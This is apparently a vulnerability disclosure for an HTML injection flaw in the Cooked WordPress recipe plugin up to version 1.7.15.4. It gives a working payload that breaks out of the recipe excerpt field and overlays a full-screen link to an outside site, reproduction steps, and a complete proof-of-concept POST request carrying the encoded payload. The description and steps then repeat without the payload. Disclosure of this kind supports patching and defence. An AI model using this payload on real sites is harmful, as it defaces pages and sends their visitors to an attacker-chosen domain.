Description:
The Cooked plugin for WordPress is vulnerable to HTML Injection in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary HTML in pages that will be shown whenever a user accesses a compromised page.
Payload:
</textarea></style>'"></textarea></div></div><meta http-equiv="</article></div></section></article><meta http-equiv= /></div></div></div><a href="https://re-alter.ru" target="_blank"><h1 style=background:black;color:pink;font-size:88px;text-align:center;font-family:monospace;line-height:108px;padding:0;margin:0;width:100vw;height:100vh;display:flex;>RE:ALTER</h1></a>
Steps to reproduce:
[0] Install & activate the plugin.
[1] Add a recipe ‘/wp-admin/post-new.php?post_type=cp_recipe’.
[2] Use your payload in the Recipe Excerpt (‘_recipe_settings[excerpt]’) text area.
[3] Submit the recipe.
[4] Injected payload will be shown on the newly created recipe page and on the general recipe browse page.
PoC request:
POST /wp-admin/post.php HTTP/2
Host: target.tld
Cookie: [contributor_cookies]
Content-Length: 4365
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
_wpnonce=c3h1a3o3s7&user_ID=4&action=editpost&originalaction=editpost&post_author=4&post_type=cp_recipe&original_post_status=auto-draft&auto_draft=&post_ID=256&meta-box-order-nonce=c3h1a3o3s7&closedpostboxesnonce=c3h1a3o3s7&post_title=PoC+HTML+Injection&samplepermalinknonce=c3h1a3o3s7&content=&wp-preview=&original_publish=Submit+for+Review&publish=Submit+for+Review&tax_input%5Bcp_recipe_category%5D%5B%5D=0&_recipe_settings%5Bcooked_version%5D=1.7.15.4&_recipe_settings%5Bcontent%5D=%3Cp%3E%5Bcooked-info+left%3D%22author%2Ctaxonomies%2Cdifficulty%22+right%3D%22print%2Cfullscreen%22%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-excerpt%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-image%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-info+left%3D%22servings%22+right%3D%22prep_time%2Ccook_time%2Ctotal_time%22%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-ingredients%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-directions%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-gallery%5D%3C%2Fp%3E&_recipe_settings%5Bexcerpt%5D=%3C%2Ftextarea%3E%3C%2Fstyle%3E%27%22%3E%3C%2Ftextarea%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Cmeta+http-equiv%3D%22%3C%2Farticle%3E%3C%2Fdiv%3E%3C%2Fsection%3E%3C%2Farticle%3E%3Cmeta+http-equiv%3D+%2F%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3Ca+href%3D%22https%3A%2F%2Fre-alter.ru%22+target%3D%22_blank%22%3E%3Ch1+style%3Dbackground%3Ablack%3Bcolor%3Apink%3Bfont-size%3A88px%3Btext-align%3Acenter%3Bfont-family%3Amonospace%3Bline-height%3A108px%3Bpadding%3A0%3Bmargin%3A0%3Bwidth%3A100vw%3Bheight%3A100vh%3Bdisplay%3Aflex%3B%3ERE%3AALTER%3C%2Fh1%3E%3C%2Fa%3E&_recipe_settings%5Bseo_description%5D=&_recipe_settings%5Bdifficulty_level%5D=0&_recipe_settings%5Bprep_time%5D=&_recipe_settings%5Bcook_time%5D=&_recipe_settings%5Btotal_time%5D=&_recipe_settings%5Bingredients%5D%5B7649384%5D%5Bamount%5D=&_recipe_settings%5Bingredients%5D%5B7649384%5D%5Bmeasurement%5D=&_recipe_settings%5Bingredients%5D%5B7649384%5D%5Bname%5D=&_recipe_settings%5Bdirections%5D%5B5166821%5D%5Bimage%5D=&_recipe_settings%5Bdirections%5D%5B5166821%5D%5Bcontent%5D=&_recipe_settings%5Bnutrition%5D%5Bserving_size%5D=&_recipe_settings%5Bnutrition%5D%5Bservings%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bfat%5D=&_recipe_settings%5Bnutrition%5D%5Bsat_fat%5D=&_recipe_settings%5Bnutrition%5D%5Btrans_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bcholesterol%5D=&_recipe_settings%5Bnutrition%5D%5Bsodium%5D=&_recipe_settings%5Bnutrition%5D%5Bpotassium%5D=&_recipe_settings%5Bnutrition%5D%5Bcarbs%5D=&_recipe_settings%5Bnutrition%5D%5Bfiber%5D=&_recipe_settings%5Bnutrition%5D%5Bsugars%5D=&_recipe_settings%5Bnutrition%5D%5Bprotein%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_a%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_c%5D=&_recipe_settings%5Bnutrition%5D%5Bcalcium%5D=&_recipe_settings%5Bnutrition%5D%5Biron%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_d%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_e%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_k%5D=&_recipe_settings%5Bnutrition%5D%5Bthiamin%5D=&_recipe_settings%5Bnutrition%5D%5Briboflavin%5D=&_recipe_settings%5Bnutrition%5D%5Bniacin%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b6%5D=&_recipe_settings%5Bnutrition%5D%5Bfolate%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b12%5D=&_recipe_settings%5Bnutrition%5D%5Bbiotin%5D=&_recipe_settings%5Bnutrition%5D%5Bpantothenic_acid%5D=&_recipe_settings%5Bnutrition%5D%5Bphosphorus%5D=&_recipe_settings%5Bnutrition%5D%5Biodine%5D=&_recipe_settings%5Bnutrition%5D%5Bmagnesium%5D=&_recipe_settings%5Bnutrition%5D%5Bzinc%5D=&_recipe_settings%5Bnutrition%5D%5Bselenium%5D=&_recipe_settings%5Bnutrition%5D%5Bcopper%5D=&_recipe_settings%5Bnutrition%5D%5Bmanganese%5D=&_recipe_settings%5Bnutrition%5D%5Bchromium%5D=&_recipe_settings%5Bnutrition%5D%5Bmolybdenum%5D=&_recipe_settings%5Bnutrition%5D%5Bchloride%5D=&_recipe_settings%5Bgallery%5D%5Btype%5D=cooked&_recipe_settings%5Bgallery%5D%5Bvideo_url%5D=&cooked_recipe_custom_box_nonce=c3h1a3o3s7&advanced_view=1&comment_status=open&post_name=
PoC video:
iamr3n0 Analyst
Description:
The Cooked plugin for WordPress is vulnerable to HTML Injection in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary HTML in pages that will be shown whenever a user accesses a compromised page.
Payload:
Steps to reproduce:
[0] Install & activate the plugin.
[1] Add a recipe ‘/wp-admin/post-new.php?post_type=cp_recipe’.
[2] Use your payload in the Recipe Excerpt (‘_recipe_settings[excerpt]’) text area.
[3] Submit the recipe.
[4] Injected payload will be shown on the newly created recipe page and on the general recipe browse page.
PoC request:
PoC video: